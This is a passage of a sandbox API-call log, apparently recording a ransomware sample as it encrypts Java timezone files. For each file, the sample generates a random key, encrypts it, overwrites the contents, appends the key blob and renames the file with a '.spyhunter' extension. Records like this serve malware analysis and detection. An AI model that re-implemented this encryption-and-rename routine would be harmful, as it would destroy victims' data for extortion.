lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.955] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.955] WriteFile (in: hFile=0xa0, lpBuffer=0x270e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x270e69c*, lpNumberOfBytesWritten=0x270e65c*=0x4, lpOverlapped=0x0) returned 1 [0167.955] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e65c*=0x30, lpOverlapped=0x0) returned 1 [0167.955] CloseHandle (hObject=0xa0) returned 1 [0167.955] GetProcessHeap () returned 0x2c0000 [0167.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.955] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.spyhunter") returned 69 [0167.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod.spyhunter")) returned 1 [0168.006] GetProcessHeap () returned 0x2c0000 [0168.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.007] GetProcessHeap () returned 0x2c0000 [0168.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.007] GetProcessHeap () returned 0x2c0000 [0168.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2b00 | out: hHeap=0x2c0000) returned 1 [0168.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e698 | out: pbBuffer=0x270e698) returned 1 [0168.007] GetProcessHeap () returned 0x2c0000 [0168.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e690*=0x30) returned 1 [0168.007] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.008] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome") returned 55 [0168.008] StrStrW (lpFirst="Rome", lpSrch=".txt") returned 0x0 [0168.008] GetProcessHeap () returned 0x2c0000 [0168.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.008] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e654*=0x5a0, lpOverlapped=0x0) returned 1 [0168.075] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.075] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e654*=0x5a0, lpOverlapped=0x0) returned 1 [0168.075] GetProcessHeap () returned 0x2c0000 [0168.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.075] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.075] WriteFile (in: hFile=0xa0, lpBuffer=0x270e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x270e694*, lpNumberOfBytesWritten=0x270e654*=0x4, lpOverlapped=0x0) returned 1 [0168.075] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e654*=0x30, lpOverlapped=0x0) returned 1 [0168.075] CloseHandle (hObject=0xa0) returned 1 [0168.076] GetProcessHeap () returned 0x2c0000 [0168.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.076] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.spyhunter") returned 65 [0168.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome.spyhunter")) returned 1 [0168.076] GetProcessHeap () returned 0x2c0000 [0168.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.077] GetProcessHeap () returned 0x2c0000 [0168.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.077] GetProcessHeap () returned 0x2c0000 [0168.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec08a0 | out: hHeap=0x2c0000) returned 1 [0168.077] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e698 | out: pbBuffer=0x270e698) returned 1 [0168.077] GetProcessHeap () returned 0x2c0000 [0168.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.077] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e690*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e690*=0x30) returned 1 [0168.077] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.077] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris") returned 56 [0168.078] StrStrW (lpFirst="Paris", lpSrch=".txt") returned 0x0 [0168.078] GetProcessHeap () returned 0x2c0000 [0168.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.078] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e654*=0x620, lpOverlapped=0x0) returned 1 [0168.105] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff9e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.105] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e654*=0x620, lpOverlapped=0x0) returned 1 [0168.105] GetProcessHeap () returned 0x2c0000 [0168.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.105] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.106] WriteFile (in: hFile=0xa0, lpBuffer=0x270e694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x270e694*, lpNumberOfBytesWritten=0x270e654*=0x4, lpOverlapped=0x0) returned 1 [0168.106] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e654, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e654*=0x30, lpOverlapped=0x0) returned 1 [0168.106] CloseHandle (hObject=0xa0) returned 1 [0168.106] GetProcessHeap () returned 0x2c0000 [0168.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.106] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.spyhunter") returned 66 [0168.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris.spyhunter")) returned 1 [0168.284] GetProcessHeap () returned 0x2c0000 [0168.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.284] GetProcessHeap () returned 0x2c0000 [0168.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.284] GetProcessHeap () returned 0x2c0000 [0168.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2680 | out: hHeap=0x2c0000) returned 1 [0168.285] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e690 | out: pbBuffer=0x270e690) returned 1 [0168.285] GetProcessHeap () returned 0x2c0000 [0168.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.285] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e688*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e688*=0x30) returned 1 [0168.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta") returned 56 [0168.286] StrStrW (lpFirst="Malta", lpSrch=".txt") returned 0x0 [0168.286] GetProcessHeap () returned 0x2c0000 [0168.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.286] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e64c*=0x5a0, lpOverlapped=0x0) returned 1 [0168.287] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.287] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e64c*=0x5a0, lpOverlapped=0x0) returned 1 [0168.287] GetProcessHeap () returned 0x2c0000 [0168.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.288] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.288] WriteFile (in: hFile=0xa0, lpBuffer=0x270e68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x270e68c*, lpNumberOfBytesWritten=0x270e64c*=0x4, lpOverlapped=0x0) returned 1 [0168.288] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e64c*=0x30, lpOverlapped=0x0) returned 1 [0168.288] CloseHandle (hObject=0xa0) returned 1 [0168.288] GetProcessHeap () returned 0x2c0000 [0168.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.288] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.spyhunter") returned 66 [0168.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta.spyhunter")) returned 1 [0168.289] GetProcessHeap () returned 0x2c0000 [0168.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.289] GetProcessHeap () returned 0x2c0000 [0168.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.289] GetProcessHeap () returned 0x2c0000 [0168.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9940 | out: hHeap=0x2c0000) returned 1 [0168.289] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e690 | out: pbBuffer=0x270e690) returned 1 [0168.289] GetProcessHeap () returned 0x2c0000 [0168.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e688*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e688*=0x30) returned 1 [0168.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid") returned 57 [0168.291] StrStrW (lpFirst="Madrid", lpSrch=".txt") returned 0x0 [0168.291] GetProcessHeap () returned 0x2c0000 [0168.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.291] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e64c*=0x588, lpOverlapped=0x0) returned 1 [0168.353] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.353] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x588, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e64c*=0x588, lpOverlapped=0x0) returned 1 [0168.354] GetProcessHeap () returned 0x2c0000 [0168.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.355] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.355] WriteFile (in: hFile=0xa0, lpBuffer=0x270e68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x270e68c*, lpNumberOfBytesWritten=0x270e64c*=0x4, lpOverlapped=0x0) returned 1 [0168.355] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e64c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e64c*=0x30, lpOverlapped=0x0) returned 1 [0168.355] CloseHandle (hObject=0xa0) returned 1 [0168.355] GetProcessHeap () returned 0x2c0000 [0168.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.356] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.spyhunter") returned 67 [0168.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid.spyhunter")) returned 1 [0168.356] GetProcessHeap () returned 0x2c0000 [0168.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.356] GetProcessHeap () returned 0x2c0000 [0168.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.357] GetProcessHeap () returned 0x2c0000 [0168.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe480 | out: hHeap=0x2c0000) returned 1 [0168.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e688 | out: pbBuffer=0x270e688) returned 1 [0168.357] GetProcessHeap () returned 0x2c0000 [0168.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e680*=0x30) returned 1 [0168.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.358] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad") returned 62 [0168.358] StrStrW (lpFirst="Kaliningrad", lpSrch=".txt") returned 0x0 [0168.358] GetProcessHeap () returned 0x2c0000 [0168.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.358] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e644*=0x2a9, lpOverlapped=0x0) returned 1 [0168.706] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.706] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e644*=0x2a9, lpOverlapped=0x0) returned 1 [0168.706] GetProcessHeap () returned 0x2c0000 [0168.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.706] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.706] WriteFile (in: hFile=0xa0, lpBuffer=0x270e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x270e684*, lpNumberOfBytesWritten=0x270e644*=0x4, lpOverlapped=0x0) returned 1 [0168.706] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e644*=0x30, lpOverlapped=0x0) returned 1 [0168.706] CloseHandle (hObject=0xa0) returned 1 [0168.706] GetProcessHeap () returned 0x2c0000 [0168.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.706] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.spyhunter") returned 72 [0168.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad.spyhunter")) returned 1 [0168.707] GetProcessHeap () returned 0x2c0000 [0168.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.707] GetProcessHeap () returned 0x2c0000 [0168.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.707] GetProcessHeap () returned 0x2c0000 [0168.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc050 | out: hHeap=0x2c0000) returned 1 [0168.707] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e688 | out: pbBuffer=0x270e688) returned 1 [0168.708] GetProcessHeap () returned 0x2c0000 [0168.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.708] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e680*=0x30) returned 1 [0168.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.708] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin") returned 57 [0168.708] StrStrW (lpFirst="Berlin", lpSrch=".txt") returned 0x0 [0168.708] GetProcessHeap () returned 0x2c0000 [0168.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.708] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e644*=0x4d4, lpOverlapped=0x0) returned 1 [0168.812] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.812] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d4, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e644*=0x4d4, lpOverlapped=0x0) returned 1 [0168.812] GetProcessHeap () returned 0x2c0000 [0168.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.812] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.812] WriteFile (in: hFile=0xa0, lpBuffer=0x270e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x270e684*, lpNumberOfBytesWritten=0x270e644*=0x4, lpOverlapped=0x0) returned 1 [0168.812] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e644, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e644*=0x30, lpOverlapped=0x0) returned 1 [0168.812] CloseHandle (hObject=0xa0) returned 1 [0168.812] GetProcessHeap () returned 0x2c0000 [0168.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.812] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.spyhunter") returned 67 [0168.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin.spyhunter")) returned 1 [0168.813] GetProcessHeap () returned 0x2c0000 [0168.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.813] GetProcessHeap () returned 0x2c0000 [0168.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.813] GetProcessHeap () returned 0x2c0000 [0168.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebddc0 | out: hHeap=0x2c0000) returned 1 [0168.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e680 | out: pbBuffer=0x270e680) returned 1 [0168.813] GetProcessHeap () 